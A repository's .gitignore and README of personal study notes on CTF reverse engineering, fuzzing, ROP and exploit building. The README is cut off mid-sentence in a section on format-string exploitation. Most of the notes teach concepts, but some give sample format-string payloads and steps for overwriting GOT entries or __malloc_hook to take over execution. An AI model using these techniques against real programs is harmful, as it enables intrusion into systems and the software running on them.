├── .gitignore └── README.md /.gitignore: -------------------------------------------------------------------------------- 1 | 2 | # Created by https://www.gitignore.io/api/vim,linux,emacs 3 | 4 | ### Emacs ### 5 | # -*- mode: gitignore; -*- 6 | *~ 7 | \#*\# 8 | /.emacs.desktop 9 | /.emacs.desktop.lock 10 | *.elc 11 | auto-save-list 12 | tramp 13 | .\#* 14 | 15 | # Org-mode 16 | .org-id-locations 17 | *_archive 18 | 19 | # flymake-mode 20 | *_flymake.* 21 | 22 | # eshell files 23 | /eshell/history 24 | /eshell/lastdir 25 | 26 | # elpa packages 27 | /elpa/ 28 | 29 | # reftex files 30 | *.rel 31 | 32 | # AUCTeX auto folder 33 | /auto/ 34 | 35 | # cask packages 36 | .cask/ 37 | dist/ 38 | 39 | # Flycheck 40 | flycheck_*.el 41 | 42 | # server auth directory 43 | /server/ 44 | 45 | # projectiles files 46 | .projectile 47 | 48 | # directory configuration 49 | .dir-locals.el 50 | 51 | ### Linux ### 52 | 53 | # temporary files which can be created if a process still has a handle open of a deleted file 54 | .fuse_hidden* 55 | 56 | # KDE directory preferences 57 | .directory 58 | 59 | # Linux trash folder which might appear on any partition or disk 60 | .Trash-* 61 | 62 | # .nfs files are created when an open file is removed but is still being accessed 63 | .nfs* 64 | 65 | ### Vim ### 66 | # swap 67 | [._]*.s[a-v][a-z] 68 | [._]*.sw[a-p] 69 | [._]s[a-v][a-z] 70 | [._]sw[a-p] 71 | # session 72 | Session.vim 73 | # temporary 74 | .netrwhist 75 | # auto-generated tag files 76 | tags 77 | 78 | # End of https://www.gitignore.io/api/vim,linux,emacs 79 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Some security related notes 2 | 3 | I have started to write down notes on the security related videos I 4 | watch (as a way of quick recall). 5 | 6 | These might be more useful to beginners. 7 | 8 | The order of notes here is _not_ in order of difficulty, but in 9 | reverse chronological order of how I write them (i.e., latest first). 10 | 11 | ## License 12 | 13 | [![CC BY-NC-SA 4.0](https://i.creativecommons.org/l/by-nc-sa/4.0/88x31.png)](http://creativecommons.org/licenses/by-nc-sa/4.0/) 14 | 15 | This work is licensed under a [Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License](http://creativecommons.org/licenses/by-nc-sa/4.0/). 16 | 17 | ## The Notes Themselves 18 | 19 | ### Misc RE tips 20 | 21 | Written on Aug 12 2017 22 | 23 | > Influenced by Gynvael's CONFidence CTF 2017 24 | > Livestreams [here](https://www.youtube.com/watch?v=kZtHy9GqQ8o) 25 | > and [here](https://www.youtube.com/watch?v=W7s5CWaw6I4); and by his 26 | > Google CTF Quals 2017 27 | > Livestream [here](https://www.youtube.com/watch?v=KvyBn4Btv8E) 28 | 29 | Sometimes, a challenge might implement a complicated task by 30 | implementing a VM. It is not always necessary to completely reverse 31 | engineer the VM and work on solving the challenge. Sometimes, you can 32 | RE a little bit, and once you know what is going on, you can hook into 33 | the VM, and get access to stuff that you need. Additionally, timing 34 | based side-channel attacks become easier in VMs (mainly due to more 35 | number of _"real"_ instructions executed. 36 | 37 | Cryptographically interesting functions in binaries can be recognized 38 | and quickly RE'd simply by looking for the constants and searching for 39 | them online. For standard crypto functions, these constants are 40 | sufficient to quickly guess at a function. Simpler crypto functions 41 | can be recognized even more easily. If you see a lot of XORs and stuff 42 | like that happening, and no easily identifiable constants, it is 43 | probably hand-rolled crypto (and also possibly broken). 44 | 45 | Sometimes, when using IDA with HexRays, the disassembly view might be 46 | better than the decompilation view. This is especially true if you 47 | notice that there seems to be a lot of complication going on in the 48 | decompilation view, but you notice repetitive patterns in the 49 | disassembly view. (You can quickly switch b/w the two using the space 50 | bar). For example, if there is a (fixed size) big-integer library 51 | implemented, then the decompilation view is terrible, but the 52 | disassembly view is easy to understand stuff (and easily recognizable 53 | due to the repetitive "with-carry" instructions such as 54 | `adc`). Additionally, when analyzing like this, using the "Group 55 | Nodes" feature in IDA's graph view is extremely useful to quickly 56 | reduce the complexity of your graph, as you understand what each node 57 | does. 58 | 59 | For weird architectures, having a good emulator is extremely 60 | useful. Especially, an emulator that can give you a dump of the memory 61 | can be used to quickly figure out what is going on, and recognize 62 | interesting portions, once you have the memory out of the 63 | emulator. Additionally, using an emulator implemented in a comfortable 64 | language (such as Python), means that you could run things exactly how 65 | you like. For example, if there is some interesting part of the code 66 | you might wish to run multiple times (for example, to brute force or 67 | something), then using the emulator, you can quickly code up something 68 | that does only that part of the code, rather than having to run the 69 | complete program. 70 | 71 | Being lazy is good, when REing. Do NOT waste time reverse engineering 72 | everything, but spend enough time doing recon (even in an RE 73 | challenge!), so as to be able to reduce the time spent on actually 74 | doing the more difficult task of REing. What recon, in such a 75 | situation means, is to just take quick looks at different functions, 76 | without spending too much time on analyzing each function 77 | thoroughly. You just quickly gauge what the function might be about 78 | (for example "looks like a crypto thing", or "looks like a memory 79 | management thing", etc.) 80 | 81 | For unknown hardware or architecture, spend enough time looking it up 82 | on Google, you might get lucky with a bunch of useful tools or 83 | documents that might help you build tools quicker. Often times, you'll 84 | find toy emulator etc implementations that might be useful as a quick 85 | point to start off from. Alternatively, you might get some interesting 86 | info (such as how bitmaps are stored, or how strings are stored, or 87 | something) with which you can write a quick "fix" script, and then use 88 | normal tools to see if interesting stuff is there. 89 | 90 | Gimp (the image manipulation tool), has a very cool open/load 91 | functionality to see raw pixel data. You can use this to quickly look 92 | for assets or repetitive structures in raw binary data. Do spend time 93 | messing around with the settings to see if more info can be gleaned 94 | from it. 95 | 96 | ### Analysis for RE and Pwning tasks in CTFs 97 | 98 | Written on Jul 2 2017 99 | 100 | > Influenced by a discussion with [@p4n74](https://github.com/p4n74/) 101 | > and [@h3rcul35](https://github.com/aazimcr) on 102 | > the [InfoSecIITR](https://github.com/InfoSecIITR/) #bin chat. We 103 | > were discussing on how sometimes beginners struggle to start with a 104 | > larger challenge binary, especially when it is stripped. 105 | 106 | To either solve the RE challenge, or to be able to pwn it, one must 107 | first analyze the given binary, in order to be able to effectively 108 | exploit it. Since the binary might possibly be stripped etc (found 109 | using `file`) one must know where to begin analysis, to get a foothold 110 | to build up from. 111 | 112 | There's a few styles of analysis, when looking for vulnerabilities in 113 | binaries (and from what I have gathered, different CTF teams have 114 | different preferences): 115 | 116 | 1. Static Analysis 117 | 118 | 1.1. Transpiling complete code to C 119 | 120 | This kind of analysis is sort of rare, but is quite useful for 121 | smaller binaries. The idea is to go in an reverse engineer the 122 | entirety of the code. Each and every function is opened in IDA 123 | (using the decompiler view), and renaming (shortcut: n) and retyping 124 | (shortcut: y) are used to quickly make the decompiled code much more 125 | readable. Then, all the code is copied/exported into a separate .c 126 | file, which can be compiled to get an equivalent (but not same) 127 | binary to the original. Then, source code level analysis can be 128 | done, to find vulns etc. Once the point of vulnerability is found, 129 | then the exploit is built on the original binary, by following along 130 | in the nicely decompiled source in IDA, side by side with the 131 | disassembly view (use Tab to quickly switch between the two; and use 132 | Space to switch quickly between Graph and Text view for 133 | disassembly). 134 | 135 | 1.2. Minimal analysis of decompilation 136 | 137 | This is done quite often, since most of the binary is relatively 138 | useless (from the attacker's perspective). You only need to analyze 139 | the functions that are suspicious or might lead you to the vuln. To 140 | do this, there are some approaches to start off: 141 | 142 | 1.2.1. Start from main 143 | 144 | Now usually, for a stripped binary, even main is not labelled (IDA 145 | 6.9 onwards does mark it for you though), but over time, you learn 146 | to recognize how to reach the main from the entry point (where IDA 147 | opens at by default). You jump to that and start analyzing from 148 | there. 149 | 150 | 1.2.2. Find relevant strings 151 | 152 | Sometimes, you know some specific strings that might be outputted 153 | etc, that you know might be useful (for example "Congratulations, 154 | your flag is %s" for an RE challenge). You can jump to Strings View 155 | (shortcut: Shift+F12), find the string, and work backwards using 156 | XRefs (shortcut: x). The XRefs let you find the path of functions 157 | to that string, by using XRefs on all functions in that chain, 158 | until you reach main (or some point that you know). 159 | 160 | 1.2.3. From some random function 161 | 162 | Sometimes, not specific string might be useful, and you don't want 163 | to start from main. So instead, you quickly flip through the whole 164 | functions list, looking for functions that look suspicious (such as 165 | having lots of constants, or lots of xors, etc) or call important 166 | functions (XRefs of malloc, free, etc), and you start off from 167 | there, and go both forwards (following functions it calls) and 168 | backwards (XRefs of the function) 169 | 170 | 1.3. Pure disassembly analysis 171 | 172 | Sometimes, you cannot use the decompilation view (because of weird 173 | architecture, or anti-decompilation techniques, or hand written 174 | assembly, or decompilation looking too unnecessarily complex). In 175 | that case, it is perfectly valid to look purely at the disassembly 176 | view. It is extremely useful (for new architectures) to turn on Auto 177 | Comments, which shows a comment explaining each 178 | instruction. Additionally, the node colorization and group nodes 179 | functionalities are immensely helpful. Even if you don't use any of 180 | these, regularly marking comments in the disassembly helps a lot. If 181 | I am personally doing this, I prefer writing down Python-like 182 | comments, so that I can quickly then transpile in manually into 183 | Python (especially useful for RE challenges, where you might have to 184 | use Z3 etc). 185 | 186 | 1.4. Using platforms like BAP, etc. 187 | 188 | This kind of analysis is (semi-)automated, and is usually more 189 | useful for much larger software, and is rarely directly used in 190 | CTFs. 191 | 192 | 2. Fuzzing 193 | 194 | Fuzzing can be an effective technique to quickly get to the vuln, 195 | without having to actually understand it initially. By using a 196 | fuzzer, one can get a lot of low-hanging-fruit style of vulns, which 197 | then need to be analyzed and triaged to get to the actual vuln. See 198 | my notes 199 | on 200 | [basics of fuzzing](https://github.com/jaybosamiya/security-notes#basics-of-fuzzing) and 201 | [genetic fuzzing](https://github.com/jaybosamiya/security-notes#genetic-fuzzing) for 202 | more info. 203 | 204 | 3. Dynamic Analysis 205 | 206 | Dynamic Analysis can be used after finding a vuln using static 207 | analysis, to help build exploits quickly. Alternatively, it can be 208 | used to find the vuln itself. Usually, one starts up the executable 209 | inside a debugger, and tries to go along code paths that trigger the 210 | bug. By placing breakpoints at the right locations, and analyzing the 211 | state of the registers/heap/stack/etc, one can get a good idea of 212 | what is going on. One can also use debuggers to quickly identify 213 | interesting functions. This can be done, for example, by setting 214 | temporary breakpoints on all functions initially; then proceeding to 215 | do 2 walks - one through all uninteresting code paths; and one 216 | through only a single interesting path. The first walk trips all the 217 | uninteresting functions and disables those breakpoints, thereby 218 | leaving the interesting ones showing up as breakpoints during the 219 | second walk. 220 | 221 | My personal style for analysis, is to start with static analysis, 222 | usually from main (or for non-console based applications, from 223 | strings), and work towards quickly finding a function that looks 224 | odd. I then spend time and branch out forwards and backwards from 225 | here, regularly writing down comments, and continuously renaming and 226 | retyping variables to improve the decompilation. Like others, I do use 227 | names like Apple,Banana,Carrot,etc for seemingly useful, but as of yet 228 | unknown functions/variables/etc, to make it easier to analyze (keeping 229 | track of func_123456 style of names is too difficult for me). I also 230 | regularly use the Structures view in IDA to define structures (and 231 | enums) to make the decompilation even nicer. Once I find the vuln, I 232 | usually move to writing a script with pwntools (and use that to call a 233 | `gdb.attach()`). This way, I can get a lot of control over what is 234 | going on. Inside gdb, I usually use plain gdb, though I have added a 235 | command `peda` that loads peda instantly if needed. 236 | 237 | My style is definitely evolving though, as I have gotten more 238 | comfortable with my tools, and also with custom tools I have written 239 | to speed things up. I would be happy to hear of other analysis styles, 240 | as well as possible changes to my style that might help me get 241 | faster. For any comments/criticisms/praise you have, as always, I can 242 | be reached on Twitter [@jay\_f0xtr0t](http://twitter.com/@jay_f0xtr0t). 243 | 244 | ### Return Oriented Programming 245 | 246 | Written on Jun 4 2017 247 | 248 | > Influenced by [this](https://www.youtube.com/watch?v=iwRSFlZoSCM) 249 | > awesome live stream by Gynvael Coldwind, where he discusses the 250 | > basics of ROP, and gives a few tips and tricks 251 | 252 | Return Oriented Programming (ROP) is one of the classic exploitation 253 | techniques, that is used to bypass the NX (non executable memory) 254 | protection. Microsoft has incorporated NX as DEP (data execution 255 | prevention). Even Linux etc, have it effective, which means that with 256 | this protection, you could no longer place shellcode onto heap/stack 257 | and have it execute just by jumping to it. So now, to be able to 258 | execute code, you jump into pre-existing code (main binary, or its 259 | libraries -- libc, ldd etc on Linux; kernel32, ntdll etc on 260 | Windows). ROP comes into existence by re-using fragments of this code 261 | that is already there, and figuring out a way to combine those 262 | fragments into doing what you want to do (which is of course, HACK THE 263 | PLANET!!!). 264 | 265 | Originally, ROP started with ret2libc, and then became more advanced 266 | over time by using many more small pieces of code. Some might say that 267 | ROP is now "dead", due to additional protections to mitigate it, but 268 | it still can be exploited in a lot of scenarios (and definitely 269 | necessary for many CTFs). 270 | 271 | The most important part of ROP, is the gadgets. Gadgets are "usable 272 | pieces of code for ROP". That usually means pieces of code that end 273 | with a `ret` (but other kinds of gadgets might also be useful; such as 274 | those ending with `pop eax; jmp eax` etc). We chain these gadgets 275 | together to form the exploit, which is known as the _ROP chain_. 276 | 277 | One of the most important assumptions of ROP is that you have control 278 | over the stack (i.e., the stack pointer points to a buffer that you 279 | control). If this is not true, then you will need to apply other 280 | tricks (such as stack pivoting) to gain this control before building a 281 | ROP chain. 282 | 283 | How do you extract gadgets? Use downloadable tools (such 284 | as [ropgadget](http://shell-storm.org/project/ROPgadget/)) or online 285 | tool (such as [ropshell](http://ropshell.com/)) or write your own 286 | tools (might be more useful for more difficult challenges sometimes, 287 | since you can tweak it to the specific challenge if need 288 | be). Basically, we just need the addresses that we can jump to for 289 | these gadgets. This is where there might be a problem with ASLR etc 290 | (in which case, you get a leak of the address, before moving on to 291 | actually doing ROP). 292 | 293 | So now, how do we use these gadgets to make a ropchain? We first look 294 | for "basic gadgets". These are gadgets that can do _simple_ tasks for 295 | us (such as `pop ecx; ret`, which can be used to load a value into ecx 296 | by placing the gadget, followed by the value to be loaded, followed by 297 | rest of chain, which is returned to after the value is loaded). The 298 | most useful basic gadgets, are usually "set a register", "store 299 | register value at address pointed to by register", etc. 300 | 301 | We can build up from these primitive functions to gain higher level 302 | functionality (similar to my post 303 | titled [exploitation abstraction](#exploitation-abstraction)). For 304 | example, using the set-register, and store-value-at-address gadgets, 305 | we can come up with a "poke" function, that lets us set any specific 306 | address with a specific value. Using this, we can build a 307 | "poke-string" function that lets us store any particular string at any 308 | particular location in memory. Now that we have poke-string, we are 309 | basically almost done, since we can create any structures that we want 310 | in memory, and can also call any functions we want with the parameters 311 | we want (since we can set-register, and can place values on stack). 312 | 313 | One of the most important reasons to build from these lower order 314 | primitives to larger functions that do more complex things, is to 315 | reduce the chances of making mistakes (which is common in ROP 316 | otherwise). 317 | 318 | There are more complex ideas, techniques, and tips for ROP, but that 319 | is possibly a topic for a separate note, for a different time :) 320 | 321 | PS: Gyn has a blogpost 322 | on [Return-Oriented Exploitation](http://gynvael.coldwind.pl/?id=149) 323 | that might be worth a read. 324 | 325 | ### Genetic Fuzzing 326 | 327 | Written on May 27 2017; extended on May 29 2017 328 | 329 | > Influenced by [this](https://www.youtube.com/watch?v=JhsHGms_7JQ) 330 | > amazing live stream by Gynvael Coldwind, where he talks about the 331 | > basic theory behind genetic fuzzing, and starts to build a basic 332 | > genetic fuzzer. He then proceeds to complete the implementation 333 | > in [this](https://www.youtube.com/watch?v=HN_tI601jNU) live stream. 334 | 335 | "Advanced" fuzzing (compared to a blind fuzzer, described in 336 | my ["Basics of Fuzzing"](#basics-of-fuzzing) note). It also 337 | modifies/mutates bytes etc, but it does it a little bit smarter than 338 | the blind "dumb" fuzzer. 339 | 340 | Why do we need a genetic fuzzer? 341 | 342 | Some programs might be "nasty" towards dumb fuzzers, since it is 343 | possible that a vulnerability might require a whole bunch of 344 | conditions to be satisfied to be reached. In a dumb fuzzer, we have 345 | very low probability of this happening since it doesn't have any idea 346 | if it is making any progress or not. As a specific example, if we have 347 | the code `if a: if b: if c: if d: crash!` (let's call it the CRASHER 348 | code), then in this case we need 4 conditions to be satisfied to crash 349 | the program. However, a dumb fuzzer might be unable to get past the 350 | `a` condition, just because there is very low chance that all 4 351 | mutations `a`, `b`, `c`, `d`, happen at same time. In fact, even if it 352 | progresses by doing just `a`, the next mutation might go back to `!a` 353 | just because it doesn't know anything about the program. 354 | 355 | Wait, when does this kind of "bad case" program show up? 356 | 357 | It is quite common in file format parsers, to take one example. To 358 | reach some specific code paths, one might need to go past multiple 359 | checks "this value must be this, and that value must be that, and some 360 | other value must be something of something else" and so 361 | on. Additionally, almost no real world software is "uncomplicated", 362 | and most software has many many many possible code paths, some of 363 | which can be accessed only after many things in the state get set up 364 | correctly. Thereby, many of these programs' code paths are basically 365 | inaccessible to dumb fuzzers. Additionally, sometimes, some paths 366 | might be completely inaccessible (rather than just crazily improbable) 367 | due to not enough mutations done whatsoever. If any of these paths 368 | have bugs, a dumb fuzzer would never be able to find them. 369 | 370 | So how do we do better than dumb fuzzers? 371 | 372 | Consider the Control Flow Graph (CFG) of the above mentioned CRASHER 373 | code. If by chance a dumb fuzzer suddenly got `a` correct, then too it 374 | would not recognize that it reached a new node, but it would continue 375 | ignoring this, discarding the sample. On the other hand, what AFL (and 376 | other genetic or "smart" fuzzers) do, is they recognize this as a new 377 | piece of information ("a newly reached path") and store this sample as 378 | a new initial point into the corpus. What this means is that now the 379 | fuzzer can start from the `a` block and move further. Of course, 380 | sometimes, it might go back to the `!a` from the `a` sample, but most 381 | of the time, it will not, and instead might be able to reach `b` 382 | block. This again is a new node reached, so adds a new sample into the 383 | corpus. This continues, allowing more and more possible paths to be 384 | checked, and finally reaches the `crash!`. 385 | 386 | Why does this work? 387 | 388 | By adding mutated samples into the corpus, that explore the graph more 389 | (i.e. reach parts not explored before), we can reach previously 390 | unreachable areas, and can thus fuzz such areas. Since we can fuzz 391 | such areas, we might be able to uncover bugs in those regions. 392 | 393 | Why is it called genetic fuzzing? 394 | 395 | This kind of "smart" fuzzing is kind of like genetic 396 | algorithms. Mutation and crossover of specimens causes new 397 | specimens. We keep specimens which are better suited to the conditions 398 | which are tested. In this case, the condition is "how many nodes in 399 | the graph did it reach?". The ones that traverse more can be 400 | kept. This is not exactly like genetic algos, but is a variation 401 | (since we keep all specimens that traverse unexplored territory, and 402 | we don't do crossover) but is sufficiently similar to get the same 403 | name. Basically, choice from pre-existing population, followed by 404 | mutation, followed by fitness testing (whether it saw new areas), and 405 | repeat. 406 | 407 | Wait, so we just keep track of unreached nodes? 408 | 409 | Nope, not really. AFL keeps track of edge traversals in the graph, 410 | rather than nodes. Additionally, it doesn't just say "edge travelled 411 | or not", it keeps track of how many times an edge was traversed. If an 412 | edge is traversed 0, 1, 2, 4, 8, 16, ... times, it is considered as a 413 | "new path" and leads to addition into the corpus. This is done because 414 | looking at edges rather than nodes is a better way to distinguish 415 | between application states, and using an exponentially increasing 416 | count of the edge traversals gives more info (an edge traversed once 417 | is quite different from traversed twice, but traversed 10 is not too 418 | different from 11 times). 419 | 420 | So, what and all do you need in a genetic fuzzer? 421 | 422 | We need 2 things, the first part is called the tracer (or tracing 423 | instrumentation). It basically tells you which instructions were 424 | executed in the application. AFL does this in a simple way by jumping 425 | in between the compilation stages. After the generation of the 426 | assembly, but before assembling the program, it looks for basic blocks 427 | (by looking for endings, by checking for jump/branch type of 428 | instructions), and adds code to each block that marks the block/edge 429 | as executed (probably into some shadow memory or something). If we 430 | don't have source code, we can use other techniques for tracing (such 431 | as pin, debugger, etc). Turns out, even ASAN can give coverage 432 | information (see docs for this). 433 | 434 | For the second part, we then use the coverage information given by the 435 | tracer to keep track of new paths as they appear, and add those 436 | generated samples into the corpus for random selection in the future. 437 | 438 | There are multiple mechanisms to make the tracer. They can be software 439 | based, or hardware based. For hardware based, there are, for example, 440 | some Intel CPU features exist where given a buffer in memory, it 441 | records information of all basic blocks traversed into that buffer. It 442 | is a kernel feature, so the kernel has to support it and provide it as 443 | an API (which Linux does). For software based, we can do it by adding 444 | in code, or using a debugger (using temporary breakpoints, or through 445 | single stepping), or use address sanitizer's tracing abilities, or use 446 | hooks, or emulators, or a whole bunch of other ways. 447 | 448 | Another way to differentiate the mechanisms is by either black-box 449 | tracing (where you can only use the unmodified binary), or software 450 | white-box tracing (where you have access to the source code, and 451 | modify the code itself to add in tracing code). 452 | 453 | AFL uses software instrumentation during compilation as the method for 454 | tracing (or through QEMU emulation). Honggfuzz supports both software 455 | and hardware based tracing methods. Other smart fuzzers might be 456 | different. The one that Gyn builds uses the tracing/coverage provided 457 | by address sanitizer (ASAN). 458 | 459 | Some fuzzers use "speedhacks" (i.e. increase fuzzing speed) such as by 460 | making a forkserver or other such ideas. Might be worth looking into 461 | these at some point :) 462 | 463 | ### Basics of Fuzzing 464 | 465 | Written on 20th April 2017 466 | 467 | > Influenced by [this](https://www.youtube.com/watch?v=BrDujogxYSk) 468 | > awesome live stream by Gynvael Coldwind, where he talks about what 469 | > fuzzing is about, and also builds a basic fuzzer from scratch! 470 | 471 | What is a fuzzer, in the first place? And why do we use it? 472 | 473 | Consider that we have a library/program that takes input data. The 474 | input may be structured in some way (say a PDF, or PNG, or XML, etc; 475 | but it doesn't need to be any "standard" format). From a security 476 | perspective, it is interesting if there is a security boundary between 477 | the input and the process / library / program, and we can pass some 478 | "special input" which causes unintended behaviour beyond that 479 | boundary. A fuzzer is one such way to do this. It does this by 480 | "mutating" things in the input (thereby _possibly_ corrupting it), in 481 | order to lead to either a normal execution (including safely handled 482 | errors) or a crash. This can happen due to edge case logic not being 483 | handled well. 484 | 485 | Crashing is the easiest way for error conditions. There might be 486 | others as well. For example, using ASAN (address sanitizer) etc might 487 | lead to detecting more things as well, which might be security 488 | issues. For example, a single byte overflow of a buffer might not 489 | cause a crash on its own, but by using ASAN, we might be able to catch 490 | even this with a fuzzer. 491 | 492 | Another possible use for a fuzzer is that inputs generated by fuzzing 493 | one program can also possibly be used in another library/program and 494 | see if there are differences. For example, some high-precision math 495 | library errors were noticed like this. This doesn't usually lead to 496 | security issues though, so we won't concentrate on this much. 497 | 498 | How does a fuzzer work? 499 | 500 | A fuzzer is basically a mutate-execute-repeat loop that explores the 501 | state space of the application to try to "randomly" find states of a 502 | crash / security vuln. It does _not_ find an exploit, just a vuln. The 503 | main part of the fuzzer is the mutator itself. More on this later. 504 | 505 | Outputs from a fuzzer? 506 | 507 | In the fuzzer, a debugger is (sometimes) attached to the application 508 | to get some kind of a report from the crash, to be able to analyze it 509 | later as security vuln vs a benign (but possibly important) crash. 510 | 511 | How to determine what areas of programs are best to fuzz first? 512 | 513 | When fuzzing, we want to usually concentrate on a single piece or 514 | small set of piece of the program. This is usually done mainly to 515 | reduce the amount of execution to be done. Usually, we concentrate on 516 | the parsing and processing only. Again, the security boundary matters 517 | a _lot_ in deciding which parts matter to us. 518 | 519 | Types of fuzzers? 520 | 521 | Input samples given to the fuzzer are called the _corpus_. In 522 | oldschool fuzzers (aka "blind"/"dumb" fuzzzers) there was a necessity 523 | for a large corpus. Newer ones (aka "genetic" fuzzers, for example 524 | AFL) do not necessarily need such a large corpus, since they explore 525 | the state on their own. 526 | 527 | How are fuzzers useful? 528 | 529 | Fuzzers are mainly useful for "low hanging fruit". It won't find 530 | complicated logic bugs, but it can find easy to find bugs (which are 531 | actually sometimes easy to miss out during manual analysis). While I 532 | might say _input_ throughout this note, and usually refer to an _input 533 | file_, it need not be just that. Fuzzers can handle inputs that might 534 | be stdin or input file or network socket or many others. Without too 535 | much loss of generality though, we can think of it as just a file for 536 | now. 537 | 538 | How to write a (basic) fuzzer? 539 | 540 | Again, it just needs to be a mutate-run-repeat loop. We need to be 541 | able to call the target often (`subprocess.Popen`). We also need to be 542 | able to pass input into the program (eg: files) and detect crashes 543 | (`SIGSEGV` etc cause exceptions which can be caught). Now, we just 544 | have to write a mutator for the input file, and keep calling the 545 | target on the mutated files. 546 | 547 | Mutators? What?!? 548 | 549 | There can be multiple possible mutators. Easy (i.e. simple to 550 | implement) ones might be to mutate bits, mutate bytes, or mutate to 551 | "magic" values. To increase chance of crash, instead of changing only 552 | 1 bit or something, we can change multiple (maybe some parameterized 553 | percentage of them?). We can also (instead of random mutations), 554 | change bytes/words/dwords/etc to some "magic" values. The magic values 555 | might be `0`, `0xff`, `0xffff`, `0xffffffff`, `0x80000000` (32-bit 556 | `INT_MIN`), `0x7fffffff` (32-bit `INT_MAX`) etc. Basically, pick ones 557 | that are common to causing security issues (because they might trigger 558 | some edge cases). We can write smarter mutators if we know more info 559 | about the program (for example, for string based integers, we might 560 | write something that changes an integer string to `"65536"` or `-1` 561 | etc). Chunk based mutators might move pieces around (basically, 562 | reorganizing input). Additive/appending mutators also work (for 563 | example causing larger input into buffer). Truncators also might work 564 | (for example, sometimes EOF might not be handled well). Basically, try 565 | a whole bunch of creative ways of mangling things. The more experience 566 | with respect to the program (and exploitation in general), the more 567 | useful mutators might be possible. 568 | 569 | But what is this "genetic" fuzzing? 570 | 571 | That is probably a discussion for a later time. However, a couple of 572 | links to some modern (open source) fuzzers 573 | are [AFL](http://lcamtuf.coredump.cx/afl/) 574 | and [honggfuzz](https://github.com/google/honggfuzz). 575 | 576 | ### Exploitation Abstraction 577 | 578 | Written on 7th April 2017 579 | 580 | > Influenced from a nice challenge 581 | > in [PicoCTF 2017](http://2017.picoctf.com/) (name of challenge 582 | > withheld, since the contest is still under way) 583 | 584 | WARNING: This note might seem simple/obvious to some readers, but it 585 | necessitates saying, since the layering wasn't crystal clear to me 586 | until very recently. 587 | 588 | Of course, when programming, all of us use abstractions, whether they 589 | be classes and objects, or functions, or meta-functions, or 590 | polymorphism, or monads, or functors, or all that jazz. However, can 591 | we really have such a thing during exploitation? Obviously, we can 592 | exploit mistakes that are made in implementing the aforementioned 593 | abstractions, but here, I am talking about something different. 594 | 595 | Across multiple CTFs, whenever I've written an exploit previously, it 596 | has been an ad-hoc exploit script that drops a shell. I use the 597 | amazing pwntools as a framework (for connecting to the service, and 598 | converting things, and DynELF, etc), but that's about it. Each exploit 599 | tended to be an ad-hoc way to work towards the goal of arbitrary code 600 | execution. However, this current challenge, as well as thinking about 601 | my previous note 602 | on 603 | ["Advanced" Format String Exploitation](#advanced-format-string-exploitation), 604 | made me realize that I could layer my exploits in a consistent way, 605 | and move through different abstraction layers to finally reach the 606 | requisite goal. 607 | 608 | As an example, let us consider the vulnerability to be a logic error, 609 | which lets us do a read/write of 4 bytes, somewhere in a small range 610 | _after_ a buffer. We want to abuse this all the way to gaining code 611 | execution, and finally the flag. 612 | 613 | In this scenario, I would consider this abstraction to be a 614 | `short-distance-write-anything` primitive. With this itself, obviously 615 | we cannot do much. Nevertheless, I make a small Python function 616 | `vuln(offset, val)`. However, since just after the buffer, there may 617 | be some data/meta-data that might be useful, we can abuse this to 618 | build both `read-anywhere` and `write-anything-anywhere` 619 | primitives. This means, I write short Python functions that call the 620 | previously defined `vuln()` function. These `get_mem(addr)` and 621 | `set_mem(addr, val)` functions are made simply (in this current 622 | example) simply by using the `vuln()` function to overwrite a pointer, 623 | which can then be dereferenced elsewhere in the binary. 624 | 625 | Now, after we have these `get_mem()` and `set_mem()` abstractions, I 626 | build an anti-ASLR abstraction, by basically leaking 2 addresses from 627 | the GOT through `get_mem()` and comparing against 628 | a [libc database](https://github.com/niklasb/libc-database) (thanks 629 | @niklasb for making the database). The offsets from these give me a 630 | `libc_base` reliably, which allows me to replace any function in 631 | the GOT with another from libc. 632 | 633 | This has essentially given me control over EIP (the moment I can 634 | "trigger" one of those functions _exactly_ when I want to). Now, all 635 | that remains is for me to call the trigger with the right parameters. 636 | So I set up the parameters as a separate abstraction, and then call 637 | `trigger()` and I have shell access on the system. 638 | 639 | TL;DR: One can build small exploitation primitives (which do not have 640 | too much power), and by combining them and building a hierarchy of 641 | stronger primitives, we can gain complete execution. 642 | 643 | ### "Advanced" Format String Exploitation 644 | 645 | Written on 6th April 2017 646 | 647 | > Influenced by [this](https://www.youtube.com/watch?v=xAdjDEwENCQ) 648 | > awesome live stream by Gynvael Coldwind, where he talks about format 649 | > string exploitation 650 | 651 | Simple format string exploits: 652 | 653 | You can use the `%p` to see what's on the stack. If the format string 654 | itself is on the stack, then one can place an address (say _foo_) onto 655 | the stack, and then seek to it using the position specifier `n$` (for 656 | example, `AAAA %7$p` might return `AAAA 0x41414141`, if 7 is the 657 | position on the stack). We can then use this to build a **read-where** 658 | primitive, using the `%s` format specifier instead (for example, `AAAA 659 | %7$s` would return the value at the address 0x41414141, continuing the 660 | previous example). We can also use the `%n` format specifier to make 661 | it into a **write-what-where** primitive. Usually instead, we use 662 | `%hhn` (a glibc extension, iirc), which lets us write one byte at a 663 | time. 664 | 665 | We use the above primitives to initially beat ASLR (if any) and then 666 | overwrite an entry in the GOT (say `exit()` or `fflush()` or ...) to 667 | then raise it to an **arbitrary-eip-control** primitive, which 668 | basically gives us **arbitrary-code-execution**. 669 | 670 | Possible difficulties (that make it "advanced" exploitation): 671 | 672 | If we have **partial ASLR**, then we can still use format strings and 673 | beat it, but this becomes much harder if we only have one-shot exploit 674 | (i.e., our exploit needs to run instantaneously, and the addresses are 675 | randomized on each run, say). The way we would beat this is to use 676 | addresses that are already in the memory, and overwrite them partially 677 | (since ASLR affects only higher order bits). This way, we can gain 678 | reliability during execution. 679 | 680 | If we have a **read only .GOT** section, then the "standard" attack of 681 | overwriting the GOT will not work. In this case, we look for 682 | alternative areas that can be overwritten (preferably function 683 | pointers). Some such areas are: `__malloc_hook` (see `man` page for 684 | the same), `stdin`'s vtable pointer to `write` or `flush`, etc. In 685 | such a scenario, having access to the libc sources is extremely 686 | useful. As for overwriting the `__malloc_hook`, it works even if the 687 | application doesn't call `malloc`, since it is calling `printf` (or 688 | similar), and internally, if we pass a width specifier greater than 689 | 64k (say `%70000c`), then it will call malloc, and thus whatever 690 | address was specified at the global variable `__malloc_hook`. 691 | 692 | If we have our format string **buffer not on the stack**, then we can 693 | still gain a **write-what-where** primitive, though it is a little 694 | more complex. First off, we need to stop using the position specifiers 695 | `n$`, since if this is used, then `printf` internally copies the stack 696 | (which we will be modifying as we go along). Now, we find two pointers 697 | that point _ahead_ into the stack itself, and use those to 